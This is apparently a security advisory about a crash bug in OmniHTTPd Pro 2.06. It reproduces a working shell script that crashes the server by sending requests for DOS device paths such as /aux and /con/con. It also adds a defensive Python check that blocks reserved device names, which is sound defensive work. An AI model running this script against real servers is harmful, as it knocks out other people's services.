COMMAND

    Omni httpd

SYSTEMS AFFECTED

    Omni Httpd pro v.2.06 Win98 (NT not tested)

PROBLEM

    Here is the exploit code to crash/freeze OmniHttpD Pro v2.06.
    In-depth information on this particular bug can be found in a
    securax advisory.

    #!/bin/sh
    #
    # Vulnerable versions:
    #     Omni Httpd pro v.2.06 Win98 (NT not tested)
    #
    # The problem:
    #     It is possible to crash remote system because OmniHttpD
    #     (version: Pro. v2.06, maybe others) parses the path strings to
    #     call some FAT32/VFAT routines in the kernel which makes your
    #     system unstable and useless until next reboot.
    #
    # Fix:
    #     Unknown for now, I mailed Omnicron Technologies ... they will
    #     probably fix this bug in next version.
    #
    # About:
    #     Discovered by: sirius from b0f
    #     Coded by: sirius from buffer0vefl0w security (b0f)
    #     [http://b0f.freebsd.lublin.pl]
    
    if [ "$1" = "" ]; then
        echo "OmniHTTPd v.2.06 DoS attack"
        echo
        echo "Coded: sirius from buffer0vefl0w security (b0f)"
        echo "[http://b0f.freebsd.lublin.pl]"
        echo
        echo "Usage: $0 <host> <port>"
        echo
        exit 1
    fi
    
    echo "Launching attack ... please wait "
    
    # this will crash some devices, but if modem is on comX the code after
    # line with comX will not be executed ... you can change the order of
    # execution ;)
    
    (echo "GET /lpt1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    (echo "GET /lpt2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    (echo "GET /com1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    (echo "GET /com2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    (echo "GET /com3" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    (echo "GET /com4" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    (echo "GET /com5" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
    
    # the following code will crash/freeze/make system busy/how to call
    # it? system
    
    (echo "GET /aux" ; sleep 5) | telnet $1 80 1>/dev/null 2>/dev/null
    (echo "GET /con/con" ; sleep 5) |telnet $1 80 1>/dev/null 2>/dev/null
    
    echo "Crash code send ..."
    killall -9 telnet 2>/dev/null 1> /dev/null
    echo "Done!"

SOLUTION

    Should be fixed.
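
    A server-side check for the path handling described under PROBLEM,
    as an added example (not code from this advisory or from the vendor):
    it rejects request targets whose path segments name a DOS device
    before they reach the filesystem. It generalizes the names requested
    by the script to the full reserved set; the function names and the
    sample request lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Reserved DOS/Windows device names. The advisory's script requests lpt1,
# lpt2, com1-com5, aux and con/con; this is the general set (assumption:
# the server should refuse all of them, not only the ones listed).
_DEVICE = re.compile(r"con|prn|aux|nul|com[1-9]|lpt[1-9]", re.IGNORECASE)


def device_segments(raw_path):
    """Return the path segments of a request target that name a DOS device."""
    path = raw_path.split("?", 1)[0].split("#", 1)[0]
    # Decode twice so a doubly encoded name (%2561ux) is still recognised.
    for _ in range(2):
        path = unquote(path)
    hits = []
    for seg in re.split(r"[/\\]+", path):
        # A device name is still resolved with trailing dots or spaces, an
        # extension ("aux.html") or a colon suffix ("con:"), so compare
        # only the part before the first dot or colon.
        base = re.split(r"[.:]", seg.rstrip(" ."), maxsplit=1)[0].rstrip(" ")
        if _DEVICE.fullmatch(base):
            hits.append(seg)
    return hits


def check_request_line(line):
    """Return (allowed, hits) for a request line such as 'GET /aux'."""
    parts = line.split()
    if len(parts) < 2:          # malformed request line: refuse it
        return False, []
    hits = device_segments(parts[1])
    return (not hits), hits


if __name__ == "__main__":
    # Constructed sample request lines: the first three follow the form
    # sent by the script above, the rest are benign or encoded variants.
    samples = [
        "GET /lpt1",
        "GET /con/con",
        "GET /aux",
        "GET /index.html HTTP/1.0",
        "GET /console/comics/index.html HTTP/1.0",
        "GET /docs/%41UX.txt HTTP/1.0",
    ]
    for line in samples:
        allowed, hits = check_request_line(line)
        print("ALLOW" if allowed else "DENY ", line, hits)
```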